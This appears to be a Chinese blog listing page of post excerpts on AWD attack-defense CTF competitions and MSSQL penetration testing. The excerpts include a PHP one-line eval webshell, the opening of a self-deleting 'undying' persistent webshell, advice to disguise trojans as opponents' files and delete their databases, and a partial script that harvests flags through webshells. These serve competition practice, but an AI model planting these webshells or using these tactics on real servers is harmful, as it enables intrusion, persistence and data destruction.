AWD
1
山兔1
网络安全爱好者
展开
-
MSSQL渗透测试
拿到目标的IP地址,我们先对IP地址进行信息收集,收集信息资产,同时使用nmap对IP地址进行扫描从扫描的结果中,我们能知道目标服务器是windows操作系统,使用的是mssql数据库,数据库端口对外开放,我们先对1433端口进行爆破没有扫描出账号密码,看一下其它的端口有没有可以利用的地方这个135端口是高危端口,我们去网上搜索一下相关利用资料,发现这个端口在之前涉及到一个冲击波病毒,这个端口有登录点,可以进行爆破,我这里使用NTscan进行爆破,没有跑出来。原创 2024-02-27 12:47:35 · 1281 阅读 · 0 评论 -
AWD思路
1.一上去要先下载html文件,进行数据库备份:mysqldump -u user -p choosedb > /tmp/db.sql /mysql -u 用户名 -p 密码 数据库名 < bak.sql/1.先修改一下自己登录的密码(密码是默认一样的),2.远程连接别人的账号,可以登一下他们的数据库,然后删库3.在最外面有放flag的文件4.扫描一下自己网站的漏洞,5.把木马伪装成别人网站里面的php文件,然后对方的地址加路径执行6.配置文件在data/config.php下面7.fl原创 2022-07-20 06:48:14 · 1403 阅读 · 2 评论 -
AWD思路
1.一上去要先下载html文件,进行数据库备份:mysqldump -u user -p choosedb > /tmp/db.sql /mysql -u 用户名 -p 密码 数据库名 < bak.sql/1.先修改一下自己登录的密码(密码是默认一样的),2.远程连接别人的账号,可以登一下他们的数据库,然后删库3.在最外面有放flag的文件4.扫描一下自己网站的漏洞,5.把木马伪装成别人网站里面的php文件,然后对方的地址加路径执行6.配置文件在data/config.php下面7.fl原创 2022-07-08 17:38:07 · 473 阅读 · 0 评论 -
AWD攻击经验
1.py脚本发现网络中其他主机:如果可以远程控制,就把getflag(自动提交flag)连上去,改一下flag的url2.flag一般在根目录,或者home、key2.批量提交FLAG在完成攻击之后,上传木马,定期连接后门,获取FLAG...原创 2022-07-08 17:35:12 · 908 阅读 · 0 评论 -
AWD防守经验
一、防守流程防守队友做的事情简单来说,按优先级有以下几个:要点:1.在最外面有放flag的文件2.配置文件在data/config.php下面3.flag在home/flag下4.他们删只能删app的文件5.比赛开始后,如果发现每个队伍的SSH账号密码都是一样的(某次比赛中都是phpcms、wordpress),需要立即修改口令,如果被其他队伍改了那就gg了。......原创 2022-07-08 17:26:57 · 2486 阅读 · 0 评论 -
PY的使用
一、如何调解PY的运行环境File里面的settings里面可以更换PY的运行环境;在绿色三角形旁边 Add Configuration,点进去,在点Templates->python,选择Python innterpreter: python2.7PY的库放在Python37\Lib\ site-packages目录下。二、pycharm怎么配置python环境1.打开软件,依次点击【File】→【Settings】→【Project】→【Project Interpreter】,这样我们原创 2021-09-11 11:09:47 · 1894 阅读 · 0 评论 -
不死马的使用
一、域名后面加上文件名在加参数,不然会找不到一句话木马在哪里,那自然无法webshell啦模板:http://192.168.248.134:8801/1.php?2=assert二、不死马的生成需要触发条件,那就是访问url/文件名.php连接的时候,输入数据记得要在英文的环境下编写,模板:URL地址:http://192.168.248.134:8801/.index.php?pass=MD5加密之前的字符连接密码:一句话木马的连接字符编码器:chr16...原创 2021-09-11 11:36:29 · 726 阅读 · 0 评论 -
cmd命令
cmd切换目录:d:这样就可以直接切换到D盘了,其他盘同理。cd Linux:就会进入到Linux文件夹里面。ls -a:查看隐藏文件。原创 2021-09-12 19:32:07 · 99 阅读 · 0 评论 -
一句话木马收藏录
<?phperror_reporting(0);eval($_GET['ccc']);?>原创 2021-09-18 15:00:43 · 141 阅读 · 0 评论 -
1、awd比赛那些事
1、用官方的恢复,扣的分值是比较大的,网站源码一旦被删,立马上传源码。2、数据库密码是弱密码,一定要及时修改。3、修改网页登录端一切的弱密码。4、查看官方后门,发现立即删掉,然后利用后门打回去。5、一定要先想着如何修复,修复好了,再去打别人。6、分工合作:漏洞挖掘、漏洞修复、攻击。7、批量脚本,一定是提前准备好,现场改。8、工具:连接ssh 、菜刀 、BP 、脚本。9、心态:不要慌,心态要放平。10、进行cat flag 的操作:curl flag_url。11、进行写新的木马的操作,权原创 2021-09-22 23:35:22 · 405 阅读 · 0 评论 -
7.awd不死马权限维持及变种
不死马又叫内存马,就是运行一段永远不退出的程序常驻在PHP进程里,无限执行。不死马.php—>上传到server—>server执行文件—>server本地无限循环生成(一句话.php)不死马生成的一句话木马可以自定义。<?php ignore_user_abort(true); //函数设置于客户机断开后,不会终止脚本的执行set_time_limit(0); //设置脚本的最大执行时间,0代表无限制unlink(__FILE__); //删除文件本身原创 2021-09-22 23:23:13 · 2604 阅读 · 0 评论 -
自动提交flag脚本
import requests#url 目标#flag_url 提交flag的url curl flag_curl#method 木马提交方式#passwd 木马密码#flag_path 后门的路径 例如:shell.php webshell.phpdef get_flag(url,flag_url,method,passwd,flag_path): # url=192.168.0.0 flag_path=shell.php url = 192.1原创 2021-09-19 00:02:26 · 1554 阅读 · 0 评论